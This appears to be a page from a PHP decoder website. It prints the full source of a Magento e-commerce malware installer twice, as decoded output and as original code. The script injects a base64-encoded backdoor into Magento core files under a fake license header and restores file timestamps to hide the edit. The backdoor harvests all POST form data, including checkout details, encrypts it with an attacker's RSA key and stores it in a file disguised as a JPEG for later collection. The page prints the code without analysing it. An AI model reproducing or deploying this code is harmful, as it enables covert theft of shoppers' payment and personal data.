Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?PHP error_reporting(E_ALL); ini_set('display_errors', 1); if (isset($_GET['del'])) ..

Decoded Output download

<?php 
error_reporting(E_ALL); 
ini_set('display_errors', 1); 
 
if (isset($_GET['del'])) 
{ 
	@unlink('./' . substr(md5($_GET['del']) , 0, 8) . '.txt'); 
	@unlink(__FILE__); 
	echo '[del ok]'; 
	exit; 
} 
 
if (!isset($_GET['do']) || !isset($_GET['fname']) || !isset($_GET['delp'])) 
{ 
	echo '[ok]'; 
	exit; 
} 
 
$resf = $ltime = null; 
$resf = str_replace("/skin", "/", str_replace("\", "/", getcwd())) . $_GET['fname']; 
 
if ($resf) 
{ 
	$files = array( 
		'../includes/config.php' => 0, 
		'../app/Mage.php' => 0, 
		'../index.php' => 0, 
		'../app/code/core/Mage/Core/Controller/Front/Action.php' => 0, 
		'../app/code/core/Mage/Core/functions.php' => 0, 
		'../lib/Varien/Autoload.php' => 0, 
	); 
	$flag = false; 
	foreach($files as $k => $v) 
	{ 
		if (file_exists($k) && is_readable($k) && is_writable($k)) 
		{ 
			$files[$k] = 1; 
			$buf = file_get_contents($k); 
			if (stripos($buf, 'Visbot') !== false && stripos($buf, 'Pong') !== false) $flag = true; 
		} 
 
		if ($flag) break; 
	} 
 
	if (!$flag) 
	{ 
		foreach($files as $k => $v) 
		{ 
			if (file_exists($k)) 
			{ 
				$ltime1 = filemtime($k); 
				$delp = $_GET['delp']; 
				$buf = file_get_contents($k); 
				$code = str_replace(array( 
					'{RESFILE}', 
					'{LTIME}', 
					'{DEL_PARAM}' 
				) , array( 
					$resf, 
					$ltime, 
					$delp 
				) , base64_decode('PD9QSFAgLyoqKiBNYWdlbnRvKiogTk9USUNFIE9GIExJQ0VOU0UqKiBUaGlzIHNvdXJjZSBmaWxlIGlzIHN1YmplY3QgdG8gdGhlIE9wZW4gU29mdHdhcmUgTGljZW5zZSAoT1NMIDMuMCkqIHRoYXQgaXMgYnVuZGxlZCB3aXRoIHRoaXMgcGFja2FnZSBpbiB0aGUgZmlsZSBMSUNFTlNFLnR4dC4qIEl0IGlzIGFsc28gYXZhaWxhYmxlIHRocm91Z2ggdGhlIHdvcmxkLXdpZGUtd2ViIGF0IHRoaXMgVVJMOiogaHR0cDovL29wZW5zb3VyY2Uub3JnL2xpY2Vuc2VzL29zbC0zLjAucGhwKiovJHkwPSd7UkVTRklMRX0nOyRtMT0ne0xUSU1FfSc7JGsyPSd7REVMX1BBUkFNfSc7JGszPSItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlHZU1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTUFEQ0JpQUtCZ0ZpS2h6RUdWVXhMZGtkQVBtVFZINzRRd1dCa1xuMGNEcHBOWDNuMGZtVlp5QlBjWVo1WUliRWVTTElPQ1hLYjV4VC9acndZeWsxM2pNSWhvOVdQbExSSmR4VDJSalxuYmNNdlhzenZXQndoMWxDb3ZybDYva3VsSXE1WmNuREZkbGNLelcyUFIvMTkrZ2tLaFJHazFZVVhNTGd3NkVGalxuajJjMUxKb1NwbnprOFdSRkFnTUJBQUU9XG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0iO2lmKEAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ109PSdWaXNib3QvMi4wICgraHR0cDovL3d3dy52aXN2by5jb20vZW4vd2VibWFzdGVycy5qc3A7Ym90QHZpc3ZvLmNvbSknKXtpZihpc3NldCgkX0dFVFskazJdKSl7JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCcnKTtAdG91Y2goJHkwLCRtMSwkbTEpO2VjaG8gJ2NsZWFuIG9rJzt9ZWxzZSBlY2hvICdQb25nJztleGl0O31pZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ107fWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ107fWVsc2V7JGk0PUAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTt9aWYoaXNzZXQoJF9QT1NUKSYmc2l6ZW9mKCRfUE9TVCkpeyRhNT0nJztmb3JlYWNoKCRfUE9TVCBhcyAkaDY9PiRuNyl7aWYoaXNfYXJyYXkoJG43KSl7Zm9yZWFjaCgkbjcgYXMgJGY4PT4kbDkpe2lmKGlzX2FycmF5KCRsOSkpe2ZvcmVhY2goJGw5IGFzICRsMTA9PiR2MTEpe2lmKGlzX2FycmF5KCR2MTEpKXs7fWVsc2V7JGE1Lj0nOicuJGg2LidbJy4kZjguJ11bJy4kbDEwLiddPScuJHYxMTt9fX1lbHNleyRhNS49JzonLiRoNi4nWycuJGY4LiddPScuJGw5O319fWVsc2V7JGE1Lj0nOicuJGg2Lic9Jy4kbjc7fX0kYTU9JGk0LiRhNTt9ZWxzZXskYTU9bnVsbDt9aWYoJGE1KXskdDEyPWZhbHNlO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fWVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ2RsJykpeyRuMTM9c3RydG9sb3dlcihzdWJzdHIocGhwX3VuYW1lKCksMCwzKSk7JGQxND0ncGhwX29wZW5zc2wuJy4oJG4xMz09J3dpbic/J2RsbCc6J3NvJyk7QGRsKCRkMTQpO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fX1pZigkdDEyKXskdDE1PUBvcGVuc3NsX2dldF9wdWJsaWNrZXkoJGszKTskcTE2PTEyODskdDE3PScnOyRoMTg9bWQ1KG1kNShtaWNyb3RpbWUoKSkucmFuZCgpKTskZTE5PSRoMTg7d2hpbGUoJGUxOSl7JGYyMD1zdWJzdHIoJGUxOSwwLCRxMTYpOyRlMTk9c3Vic3RyKCRlMTksJHExNik7QG9wZW5zc2xfcHVibGljX2VuY3J5cHQoJGYyMCwkaDIxLCR0MTUpOyR0MTcuPSRoMjE7fSR0MjI9QG9wZW5zc2xfZW5jcnlwdCgkYTUsJ2FlczEyOCcsJGgxOCk7QG9wZW5zc2xfZnJlZV9rZXkoJHQxNSk7JGE1PSR0MTcuJzo6OlNFUDo6OicuJHQyMjt9JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCdKUEVHLTEuMScuYmFzZTY0X2VuY29kZSgkYTUpLEZJTEVfQVBQRU5EKTtAdG91Y2goJHkwLCRtMSwkbTEpO30/Pg==')); 
				file_put_contents($k, $code . $buf); 
				touch($k, $ltime1, $ltime1); 
				$buf = @file_get_contents($k); 
				if (strpos($buf, $delp) === false) {echo $k.":not writable"; continue;} 
				echo '[done]'; 
				break; 
			} 
		} 
	} 
} 
 
?>

Did this file decode correctly?

Original Code

<?PHP
error_reporting(E_ALL);
ini_set('display_errors', 1);

if (isset($_GET['del']))
{
	@unlink('./' . substr(md5($_GET['del']) , 0, 8) . '.txt');
	@unlink(__FILE__);
	echo '[del ok]';
	exit;
}

if (!isset($_GET['do']) || !isset($_GET['fname']) || !isset($_GET['delp']))
{
	echo '[ok]';
	exit;
}

$resf = $ltime = null;
$resf = str_replace("/skin", "/", str_replace("\\", "/", getcwd())) . $_GET['fname'];

if ($resf)
{
	$files = array(
		'../includes/config.php' => 0,
		'../app/Mage.php' => 0,
		'../index.php' => 0,
		'../app/code/core/Mage/Core/Controller/Front/Action.php' => 0,
		'../app/code/core/Mage/Core/functions.php' => 0,
		'../lib/Varien/Autoload.php' => 0,
	);
	$flag = false;
	foreach($files as $k => $v)
	{
		if (file_exists($k) && is_readable($k) && is_writable($k))
		{
			$files[$k] = 1;
			$buf = file_get_contents($k);
			if (stripos($buf, 'Visbot') !== false && stripos($buf, 'Pong') !== false) $flag = true;
		}

		if ($flag) break;
	}

	if (!$flag)
	{
		foreach($files as $k => $v)
		{
			if (file_exists($k))
			{
				$ltime1 = filemtime($k);
				$delp = $_GET['delp'];
				$buf = file_get_contents($k);
				$code = str_replace(array(
					'{RESFILE}',
					'{LTIME}',
					'{DEL_PARAM}'
				) , array(
					$resf,
					$ltime,
					$delp
				) , base64_decode('PD9QSFAgLyoqKiBNYWdlbnRvKiogTk9USUNFIE9GIExJQ0VOU0UqKiBUaGlzIHNvdXJjZSBmaWxlIGlzIHN1YmplY3QgdG8gdGhlIE9wZW4gU29mdHdhcmUgTGljZW5zZSAoT1NMIDMuMCkqIHRoYXQgaXMgYnVuZGxlZCB3aXRoIHRoaXMgcGFja2FnZSBpbiB0aGUgZmlsZSBMSUNFTlNFLnR4dC4qIEl0IGlzIGFsc28gYXZhaWxhYmxlIHRocm91Z2ggdGhlIHdvcmxkLXdpZGUtd2ViIGF0IHRoaXMgVVJMOiogaHR0cDovL29wZW5zb3VyY2Uub3JnL2xpY2Vuc2VzL29zbC0zLjAucGhwKiovJHkwPSd7UkVTRklMRX0nOyRtMT0ne0xUSU1FfSc7JGsyPSd7REVMX1BBUkFNfSc7JGszPSItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlHZU1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTUFEQ0JpQUtCZ0ZpS2h6RUdWVXhMZGtkQVBtVFZINzRRd1dCa1xuMGNEcHBOWDNuMGZtVlp5QlBjWVo1WUliRWVTTElPQ1hLYjV4VC9acndZeWsxM2pNSWhvOVdQbExSSmR4VDJSalxuYmNNdlhzenZXQndoMWxDb3ZybDYva3VsSXE1WmNuREZkbGNLelcyUFIvMTkrZ2tLaFJHazFZVVhNTGd3NkVGalxuajJjMUxKb1NwbnprOFdSRkFnTUJBQUU9XG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0iO2lmKEAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ109PSdWaXNib3QvMi4wICgraHR0cDovL3d3dy52aXN2by5jb20vZW4vd2VibWFzdGVycy5qc3A7Ym90QHZpc3ZvLmNvbSknKXtpZihpc3NldCgkX0dFVFskazJdKSl7JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCcnKTtAdG91Y2goJHkwLCRtMSwkbTEpO2VjaG8gJ2NsZWFuIG9rJzt9ZWxzZSBlY2hvICdQb25nJztleGl0O31pZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ107fWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ107fWVsc2V7JGk0PUAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTt9aWYoaXNzZXQoJF9QT1NUKSYmc2l6ZW9mKCRfUE9TVCkpeyRhNT0nJztmb3JlYWNoKCRfUE9TVCBhcyAkaDY9PiRuNyl7aWYoaXNfYXJyYXkoJG43KSl7Zm9yZWFjaCgkbjcgYXMgJGY4PT4kbDkpe2lmKGlzX2FycmF5KCRsOSkpe2ZvcmVhY2goJGw5IGFzICRsMTA9PiR2MTEpe2lmKGlzX2FycmF5KCR2MTEpKXs7fWVsc2V7JGE1Lj0nOicuJGg2LidbJy4kZjguJ11bJy4kbDEwLiddPScuJHYxMTt9fX1lbHNleyRhNS49JzonLiRoNi4nWycuJGY4LiddPScuJGw5O319fWVsc2V7JGE1Lj0nOicuJGg2Lic9Jy4kbjc7fX0kYTU9JGk0LiRhNTt9ZWxzZXskYTU9bnVsbDt9aWYoJGE1KXskdDEyPWZhbHNlO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fWVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ2RsJykpeyRuMTM9c3RydG9sb3dlcihzdWJzdHIocGhwX3VuYW1lKCksMCwzKSk7JGQxND0ncGhwX29wZW5zc2wuJy4oJG4xMz09J3dpbic/J2RsbCc6J3NvJyk7QGRsKCRkMTQpO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fX1pZigkdDEyKXskdDE1PUBvcGVuc3NsX2dldF9wdWJsaWNrZXkoJGszKTskcTE2PTEyODskdDE3PScnOyRoMTg9bWQ1KG1kNShtaWNyb3RpbWUoKSkucmFuZCgpKTskZTE5PSRoMTg7d2hpbGUoJGUxOSl7JGYyMD1zdWJzdHIoJGUxOSwwLCRxMTYpOyRlMTk9c3Vic3RyKCRlMTksJHExNik7QG9wZW5zc2xfcHVibGljX2VuY3J5cHQoJGYyMCwkaDIxLCR0MTUpOyR0MTcuPSRoMjE7fSR0MjI9QG9wZW5zc2xfZW5jcnlwdCgkYTUsJ2FlczEyOCcsJGgxOCk7QG9wZW5zc2xfZnJlZV9rZXkoJHQxNSk7JGE1PSR0MTcuJzo6OlNFUDo6OicuJHQyMjt9JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCdKUEVHLTEuMScuYmFzZTY0X2VuY29kZSgkYTUpLEZJTEVfQVBQRU5EKTtAdG91Y2goJHkwLCRtMSwkbTEpO30/Pg=='));
				file_put_contents($k, $code . $buf);
				touch($k, $ltime1, $ltime1);
				$buf = @file_get_contents($k);
				if (strpos($buf, $delp) === false) {echo $k.":not writable"; continue;}
				echo '[done]';
				break;
			}
		}
	}
}

?>

Function Calls

md5 1
substr 1
unlink 1
ini_set 1
error_reporting 1

Variables

None

Stats

MD5 3e372d732ec0352173ff9a1aff524a31
Eval Count 0
Decode Time 154 ms